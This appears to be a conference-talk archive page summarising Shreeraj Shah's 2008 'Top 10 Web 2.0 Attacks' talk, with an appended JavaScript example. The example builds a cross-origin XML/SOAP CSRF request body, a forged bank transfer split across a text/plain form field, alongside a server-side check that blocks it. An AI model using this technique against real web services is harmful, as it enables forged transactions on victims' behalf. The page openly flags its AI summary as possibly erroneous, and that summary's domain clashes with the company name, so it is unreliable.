Hackers of India

Top 10 Web 2.0 Attacks

By Shreeraj Shah on 29 Oct 2008 @ HITB SecConf


Presentation Material

Abstract

Shreeraj Shah, B.E., MSCS, MBA, is the founder of Blueinfy, a company that provides application security services. Prior to founding Blueinfy, he was a founder and board member at Net Square. He has also worked in the security space at Foundstone (McAfee), Chase Manhattan Bank and IBM. He has performed many security consulting assignments in the areas of penetration testing, code review, web application assessment and security architecture review.

He is also the author of popular books such as Hacking Web Services (Thomson 06) and Web Hacking: Attacks and Defense (Addison-Wesley 03). In addition, he has published several advisories, tools and whitepapers, and has presented at numerous conferences including RSA, AusCERT, InfosecWorld (Misti), HackInTheBox, Blackhat, OSCON, Bellua, Syscan and ISACA. His articles are regularly published on SecurityFocus, InformIT, DevX, O'Reilly and HNS, and he has been quoted as an expert by the BBC, Dark Reading and Bank Technology.

AI Generated Summary (may contain errors)

Here is a summarized version of the content:

Identity and Purpose

The speaker is an application security expert who discusses web application security, specifically the attack surface of Web 2.0 applications, with a focus on XML-based CSRF attacks.

Main Points

  1. iFrame restrictions: Each iframe has its own DOM. Under the same-origin policy, script in one iframe cannot reach the DOM of an iframe loaded from a different origin, so content from different sites is isolated even when it is composed on one page.
  2. Widget, gadget, and module architecture: Web 2.0 pages are assembled from such components, and when analyzing them, checks are made to identify potential vulnerabilities in how each component is loaded and how it exchanges data with the host page.
  3. Countermeasures and security scanning: Analyzing the codebase, identifying the linkage between client and server and the method signatures it exposes, and filtering content are essential for securing Web 2.0 applications.
  4. XML-based CSRF attacks: The speaker explains how an XML (SOAP-style) envelope can be delivered to a web service by a cross-origin HTML form and demonstrates a one-way CSRF attack. The same-origin policy does not stop the victim's browser from submitting the form; it only prevents the attacker from reading the response, which is why the attack is one-way (blind).

Q&A

A question is asked about the same-origin policy not kicking in during an XML-based CSRF attack. The speaker clarifies that this can be achieved by creating a form with input type headers, injecting part of the XML envelope into the name field, and using the rest of the envelope as the value. This allows the creation of a legitimate-looking XML envelope, which can bypass security checks.
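The form-based delivery of an XML envelope described in point 4 and in the Q&A above, as an added example that is not part of the talk or its slides. A browser serializes a form with enctype="text/plain" as name, "=", value and CRLF for each field, with nothing escaped, so splitting the envelope across a hidden field's name and value reconstructs a well-formed document if the "=" is made to land inside an XML comment. The target service URL, namespace, method and field names are hypothetical, the use of a hidden input is an assumption, and the accept-check at the end is an assumed server-side policy rather than a countermeasure from the talk.

```javascript
// Added example, not from the talk: reconstruct the request body a victim's
// browser would POST for a cross-origin text/plain form carrying SOAP/XML.
// Browsers encode such a form as: name + "=" + value + "\r\n" per field, with
// no percent-encoding. The "=" is swallowed by opening an XML comment at the
// end of the name and closing it at the start of the value.

// Hypothetical service, namespace, method and field names.
const ENVELOPE_HEAD =
  '<?xml version="1.0"?>' +
  '<soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">' +
  '<soap:Body><ns:transfer xmlns:ns="urn:bank">' +
  '<ns:to>ATTACKER-ACCT</ns:to><ns:amount>1000</ns:amount>' +
  '<!--';                                        // comment opened in the name ...
const ENVELOPE_TAIL =
  '-->' +                                        // ... and closed in the value,
  '</ns:transfer></soap:Body></soap:Envelope>';  // so "<!--=-->" absorbs the "="

// Reproduce the browser's text/plain form serialization.
function encodeTextPlainForm(fields) {
  return fields.map(([name, value]) => `${name}=${value}\r\n`).join('');
}

// The body the browser sends if the victim's page contains (assumed markup):
//   <form action="https://bank.example/ws" method="POST" enctype="text/plain">
//     <input type="hidden" name="[ENVELOPE_HEAD]" value="[ENVELOPE_TAIL]">
//   </form>
// The response is never readable by the attacker's page (same-origin
// policy), which is what makes this a one-way attack.
function buildCsrfBody() {
  return encodeTextPlainForm([[ENVELOPE_HEAD, ENVELOPE_TAIL]]);
}

// Minimal stand-in for an XML parser: the "=" must sit inside the comment and
// the element open/close counts must balance.
function isWellFormedEnvelope(body) {
  const commentOk = /<!--=-->/.test(body);
  const opens = (body.match(/<(?!\/|!|\?)[^>]+>/g) || []).length;
  const closes = (body.match(/<\/[^>]+>/g) || []).length;
  return commentOk && opens === closes && body.trim().endsWith('</soap:Envelope>');
}

// Defensive side (assumed policy): a plain HTML form can only send
// text/plain, application/x-www-form-urlencoded or multipart/form-data and
// cannot add custom headers, so requiring an XML content type plus a custom
// header rejects the forged POST before the body is ever parsed.
function acceptsSoapRequest(headers) {
  const ct = (headers['content-type'] || '').toLowerCase();
  const xmlType = ct.startsWith('text/xml') || ct.startsWith('application/soap+xml');
  const hasCustomHeader = typeof headers['x-requested-with'] === 'string';
  return xmlType && hasCustomHeader;
}

const body = buildCsrfBody();
console.log(body);
console.log('well-formed envelope:', isWellFormedEnvelope(body));
console.log('forged form POST accepted:',
  acceptsSoapRequest({ 'content-type': 'text/plain' }));
console.log('legitimate client accepted:',
  acceptsSoapRequest({ 'content-type': 'text/xml; charset=utf-8',
                       'x-requested-with': 'XMLHttpRequest' }));
```

The comment trick matters because the browser inserts exactly one "=" between name and value; without somewhere harmless to put it, the character ends up as element text and the envelope carries an unintended value. On the server side, checking the Content-Type alone is not enough if the service also accepts form-encoded input, hence the additional custom-header requirement in the example.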

Conclusion

The speaker provides their email address and invites attendees to download tools from their company website (the summary gives the domain as blueantfeed.com; the company named in the bio is Blueinfy).